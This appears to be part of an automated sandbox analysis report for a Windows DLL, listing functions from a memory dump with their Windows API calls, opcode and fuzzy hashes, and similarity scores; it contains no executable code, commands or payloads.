Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast$_abort_free
String ID:
API String ID: 942303603-0
Opcode ID: 6c6d18163936ab39d13a1ceef612e7c9af07eb2a71debbffb9dd0c95170e9731
Instruction ID: 4293245f43e1c93b345f1d78e417e5bef1f5216412b299b83cf559080588ea6d
Opcode Fuzzy Hash: 6c6d18163936ab39d13a1ceef612e7c9af07eb2a71debbffb9dd0c95170e9731
Instruction Fuzzy Hash: 4C61F0B1610707DFEB288FA8CD96BAA77B8FF05314F1048A9E815C6594F774EA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EE411, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,000000FF), ref: 6E7EE509
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,000000FF), ref: 6E7EE513
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,000000FF), ref: 6E7EE520

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 19e90f0542937c6a0dad48f2c65aaef13d277425871d38d40142aeb1ed937f6d
Instruction ID: 9e69d2d2df2af0802ab28c6f3de28948f9327ad3e85f698942cbbf6224007d95
Opcode Fuzzy Hash: 19e90f0542937c6a0dad48f2c65aaef13d277425871d38d40142aeb1ed937f6d
Instruction Fuzzy Hash: 0E31B1B490122D9BCB61DF68D988BC9BBB8FF09310F5045EAE41CA6660E7309B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F607A, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(6E7F6079,?,6E7F6079,00000000), ref: 6E7F609C
TerminateProcess.KERNEL32(00000000,?,6E7F6079,00000000), ref: 6E7F60A3
ExitProcess.KERNEL32 ref: 6E7F60B5

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5f963ef24730fb3d8c9b9d7a084de534cc7b93af5ed860426f7469e4b86a2047
Instruction ID: cdd403234f08e1855c0fe5f2f90e7f860a107e1135112e2755b5590e75601c43
Opcode Fuzzy Hash: 5f963ef24730fb3d8c9b9d7a084de534cc7b93af5ed860426f7469e4b86a2047
Instruction Fuzzy Hash: 90E0B631120548EFCF116FE4DA18A583B69EB45292B204869F809CA231CB35DA92DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FC8C1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 6E7FCA72

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: c9ad75b80aaafe7db886ab9e8b51f869b7de8b8e0b3ea701699a9af17223297d
Instruction ID: 7ed333b8f5530abf6aade656b76c149cce3b7bd13aa2085d380c4c7fb3b36ae0
Opcode Fuzzy Hash: c9ad75b80aaafe7db886ab9e8b51f869b7de8b8e0b3ea701699a9af17223297d
Instruction Fuzzy Hash: B8310772800249AFDB14CEB8CD88EEB7BBDEF86315F0005A9E419DB365D6309A46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F2E50, Relevance: 3.5, APIs: 2, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 806412df40715e5fc72bba5e182001031801659f0e4fbd9c2866921160971223
Instruction ID: c648ca4a138f7f00af036324ccdb16e749ef412101158851c602c8528504022e
Opcode Fuzzy Hash: 806412df40715e5fc72bba5e182001031801659f0e4fbd9c2866921160971223
Instruction Fuzzy Hash: D8025A71E00219EBDB14CFA9C98469DBBF1FF48314F14416AD819E7394D731AA02CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7C71, Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,6E7E26EC,?,972AE1C9,00000000,00000000,6E808FA0,000000FF), ref: 6E7E7CB5
HeapFree.KERNEL32(00000000,?,?,6E7E26EC,?,972AE1C9,00000000,00000000,6E808FA0,000000FF), ref: 6E7E7CBC

Part of subcall function 6E7E7B2A: GetProcessHeap.KERNEL32(00000000,?,?,6E7E7C8F,00000000,?,?,6E7E26EC,?,972AE1C9,00000000,00000000,6E808FA0,000000FF), ref: 6E7E7B42
Part of subcall function 6E7E7B2A: HeapFree.KERNEL32(00000000,?,6E7E7C8F,00000000,?,?,6E7E26EC,?,972AE1C9,00000000,00000000,6E808FA0,000000FF), ref: 6E7E7B49

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b3ca36a8e181cd69def0bbdd098a0ce1f224814f2289b361ff11c30214cb4771
Instruction ID: 8c03ef3bb778455cd447128d4fadafd96a8b33d07e18c875163f77615570354b
Opcode Fuzzy Hash: b3ca36a8e181cd69def0bbdd098a0ce1f224814f2289b361ff11c30214cb4771
Instruction Fuzzy Hash: C7F08232101A16ABCB212BD5DA19B9A7B5CEF81B11F14483DF45D52AF1DB319840CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FBDD1, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000030), ref: 6E7FBFFE

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: dc4665a8a37faf4ed563cc8100645609bd8a1640c7a8c24ae904ff37b85a645b
Instruction ID: 181fff8c536a2f70412debdc8617b42a46ddcb259e5eb001f303c2defd432181
Opcode Fuzzy Hash: dc4665a8a37faf4ed563cc8100645609bd8a1640c7a8c24ae904ff37b85a645b
Instruction Fuzzy Hash: F4B1343162060ACFD705CF68C696B547BE0FB45365F258668E9A9CF2A5C335E982CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E4FD6, Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 6E7E4FEF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: df02205f5369a2c982c94fbce6dc0a5609dd93586ee94dbbb623382a7c747cc5
Instruction ID: d1f04928e2a492482ec954f442e9de2116f63a78302da5b5ddb22d706347ad7f
Opcode Fuzzy Hash: df02205f5369a2c982c94fbce6dc0a5609dd93586ee94dbbb623382a7c747cc5
Instruction Fuzzy Hash: 31416C7190160ADFEB44CFA5E6D27AEBBF5FB45300F20856AD419EBA60D3749940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8054B7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

Part of subcall function 6E7F9964: _free.LIBCMT ref: 6E7F99BF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E80550B

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: ec3f441868620b7a3986ebca6cb705691803f4cc6e7163b2f5abe5cc449900fe
Instruction ID: 0bb3e5aa256cff7b87bb93699e5c021761d08d7e4c9c9948392e95ce3b92cdf6
Opcode Fuzzy Hash: ec3f441868620b7a3986ebca6cb705691803f4cc6e7163b2f5abe5cc449900fe
Instruction Fuzzy Hash: 7021F272A1430AABDB24CFE8DC45BAA73BDEF45314F10097AEC05D6180EB34AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E80513F, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

EnumSystemLocalesW.KERNEL32(6E805267,00000001,00000000,?,6E7FADEF,?,6E805894,00000000,?,?,?), ref: 6E8051B1

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: a7d16cd91d9bc26e360f060b6ee21551af7058b50f2899b8db7646d8ed8e5836
Instruction ID: e6cd4a78ba65ca35077effbd67af3f98b6c5812da70413bd6de517ce131457cc
Opcode Fuzzy Hash: a7d16cd91d9bc26e360f060b6ee21551af7058b50f2899b8db7646d8ed8e5836
Instruction Fuzzy Hash: 41114C3B2047059FDB189FB8CC905BAB7A2FF80728B19482CD98647B40D3317543CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E32C0, Relevance: 1.6, APIs: 1, Instructions: 56comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(6E80A3B0,00000000,00000001,6E818518,?,972AE1C9,?,?,?,?,Function_00039510,000000FF), ref: 6E7E331C

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 23fcdb8087ebe149f04038cf408f3f053cc301d1ada7334b60c7f0795a3f7a4f
Instruction ID: e527eedc940fa998b64ec6b001a267855b632b1858cd09702cb3a2089bc2c12a
Opcode Fuzzy Hash: 23fcdb8087ebe149f04038cf408f3f053cc301d1ada7334b60c7f0795a3f7a4f
Instruction Fuzzy Hash: B511A172608615AFC310CF89D884F56F7B8FB49B60F10427AE9059BB50DB315800CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8056E7, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E805562,00000000,00000000,?), ref: 6E805713

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort
String ID:
API String ID: 2070445861-0
Opcode ID: 40a6bf8e125c9988c5f8d1450aa40f601ab9357e58e8ab1bf0fb9afd7db1e693
Instruction ID: 874843bbbac62d2923c855883068eb4673fbcef58e46433b135864fec3206713
Opcode Fuzzy Hash: 40a6bf8e125c9988c5f8d1450aa40f601ab9357e58e8ab1bf0fb9afd7db1e693
Instruction Fuzzy Hash: 1BF0A236610216EBDB259BE4CC05ABA776CFB40764F114C69DC15A3180EA74A901DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E80504B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

Part of subcall function 6E7F9964: _free.LIBCMT ref: 6E7F99BF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E7FADF6,00000000,6E7FAF16), ref: 6E80509F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: 234ef4ae5d09f8d5a633b19d2aee02cea8f6c5e6799e533f2ecf1c445d21738e
Instruction ID: a06b30f23f1115e65c0acc85cb39f4a9ea750bd3a6b81ba3440c10a9e18e1235
Opcode Fuzzy Hash: 234ef4ae5d09f8d5a633b19d2aee02cea8f6c5e6799e533f2ecf1c445d21738e
Instruction Fuzzy Hash: E4F0F932600205DBD7149FF4CD099FA73ACDF49314F010579E906D7240EA345E05C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8051DA, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

EnumSystemLocalesW.KERNEL32(6E8054B7,00000001,FFFFFFFF,?,6E7FADEF,?,6E805858,6E7FADEF,?,?,?,?,?,6E7FADEF,?,?), ref: 6E805226

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: 8fdc183efc89f2e7a630eedc7f7f920ac986260526701e6c021938d8079bd19c
Instruction ID: e70fc4ac36dd451188b67affc4cd3bfacc07fa2dea06ef5b214a8069ede1f8bd
Opcode Fuzzy Hash: 8fdc183efc89f2e7a630eedc7f7f920ac986260526701e6c021938d8079bd19c
Instruction Fuzzy Hash: C7F0FC362047055FD7245FF9CC81AAB7B95EF8076CF05482CE9458B680D7719842C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FD466, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F6CF5: EnterCriticalSection.KERNEL32(-6E81FF0D,?,6E7FDDDB,?,6E81C378,0000000C), ref: 6E7F6D04

EnumSystemLocalesW.KERNEL32(6E7FD459,00000001,6E81C338,0000000C), ref: 6E7FD49E

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 1a19ce4d5f451bd77b1c6324d488e49b20ce9178d80cf6a9c71753509e40eb76
Instruction ID: a54eda827bbbde03a6be0d031f322cd5f00b9f92d699c8f40c019e2f340ea909
Opcode Fuzzy Hash: 1a19ce4d5f451bd77b1c6324d488e49b20ce9178d80cf6a9c71753509e40eb76
Instruction Fuzzy Hash: 50F08732910208EFEB00DFE8C609B9D37A0BB05320F008529F818DB6A0CB309A86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FD9CB, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,?,6E7FAE89,?,20001004,?,00000002,?), ref: 6E7FDA0A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2c50214009d9dab814ccc3a279009f6ad16022a8ea6627619cb1201ffbc9c209
Instruction ID: 0d30cfa12f95b057be6908739df5d47c0ede9bff60defea53f40608af719a279
Opcode Fuzzy Hash: 2c50214009d9dab814ccc3a279009f6ad16022a8ea6627619cb1201ffbc9c209
Instruction Fuzzy Hash: C5F05431501618EBCF019FA4CD04BAE7B69EF09711B004558FD0566260CB319E22AE99

Uniqueness

Uniqueness Score: -1.00%

Function 6E8050F4, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

EnumSystemLocalesW.KERNEL32(6E80504B,00000001,FFFFFFFF,?,?,6E8058B6,6E7FADEF,?,?,?,?,?,6E7FADEF,?,?,?), ref: 6E80512B

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort
String ID:
API String ID: 2626063627-0
Opcode ID: c63c1396971ee83431075bc14db72ad76bbe2aef49b2215fb154d9635d4b61fc
Instruction ID: c6b2c3f049bf09d12cb2211e311943076c4ff85ba0e92c497f55f94aede31898
Opcode Fuzzy Hash: c63c1396971ee83431075bc14db72ad76bbe2aef49b2215fb154d9635d4b61fc
Instruction Fuzzy Hash: E7F0E53630030597CB149FB5CC556AA7FA5EFC2724F074458EA0A8B690D675D983C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7ED0FD, Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

0, xrefs: 6E7ED26D

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction ID: d7d6f759e90b9b88a8210903c10f6434c4714d798948b412215e6d299908f1a1
Opcode Fuzzy Hash: 41a65894c1243ec84d441c124d89baabc1dcae01a738f4c9180a4174ac12db86
Instruction Fuzzy Hash: 615197616487469BDB908DF88B647EF33AD9BC2308F020939C7518BEB0D625D942CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 6E800FF9, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cb7e6925400d356dce3810e8d4b8ce64f46067a9742b38d0955dbe9691111d8
Instruction ID: 052621d879f9ed025964060dac8fa10402eab93b39d04979ffaeb00c12dd95ef
Opcode Fuzzy Hash: 4cb7e6925400d356dce3810e8d4b8ce64f46067a9742b38d0955dbe9691111d8
Instruction Fuzzy Hash: 00324931D69F024DDB639534CC323256699AFB73D8F11DB27F829B5D9AEB29C4838140

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D28D0, Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID:
API String ID: 3709121408-0
Opcode ID: 68ff98bfaebd46c3e73989c4d1b61de2535ac72094225f3e99074061cc00932d
Instruction ID: c6c49ccc4302961783ec06506a89a8b50a7af917162251acc608e445082e8b91
Opcode Fuzzy Hash: 68ff98bfaebd46c3e73989c4d1b61de2535ac72094225f3e99074061cc00932d
Instruction Fuzzy Hash: 19E1C072E00559ABDF05CFA8DD45AEEBBB9FF49300F14452EF805A7260E7349906CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EA250, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b965c7b4e90a27b109ddd0468456f41ab25859b43360492e3e7af4ddbfce8a0e
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 99918A7220C1A34EE79D46BE867403EFFF15A923A130607ADE4F2CE9E5EE10C555DA20

Uniqueness

Uniqueness Score: -1.00%

Function 6E7EA50B, Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 0f7e1df986b2f54649778043adf43001b53dc634b2636291811bf06ea906a799
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 7291247220D0E34DE79946BE867443EFFF15A923A130A07ADD4F6CE9E9FE14C1549A20

Uniqueness

Uniqueness Score: -1.00%

